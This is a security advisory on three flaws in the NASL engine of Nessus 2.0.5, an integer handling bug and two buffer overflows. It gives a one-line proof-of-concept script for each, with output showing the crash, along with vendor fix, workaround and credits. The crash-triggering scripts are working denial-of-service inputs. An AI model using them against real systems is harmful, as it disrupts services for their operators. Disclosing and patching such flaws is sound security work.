Heads Up, Nessus Expoits.There exists some vulnerabilities in NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins in the
Nessus server (this option is disabled by default) or he/she would need to
trick a user somehow into running a specially crafted nasl script.
Not that these issues can NOT be exploited by a tested host to crash
nessusd remotely.
* ISSUE 1 - Integer handling vulnerability in insstr() function
Vulnerability is triggered by a negative fourth argument:
$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
* ISSUE 2 - Buffer overflow in scanner_add_port() function
Overflow is triggered by very long 'proto' argument:
$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
* ISSUE 3 - Buffer overflow in ftp_log_in() function
Overflow is triggered by very long 'user'/'pass' arguments:
$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));
$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
III. VERSIONS TESTED
Linux RedHat 7.2
$ nasl -v | grep nasl
nasl 2.0.5
IV. VENDOR STATUS
New nessus 2.0.6 packages fixes these issues.
V. WORKAROUND
Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run unstrusted nasl scripts.
VI. CREDITS
Hank Leininger
requested the source code audit
for some opensource projects and for nessus in particular.
Sir Mordred discovered the issues.
Renaud Deraison fixed them in an hour after being
notified.
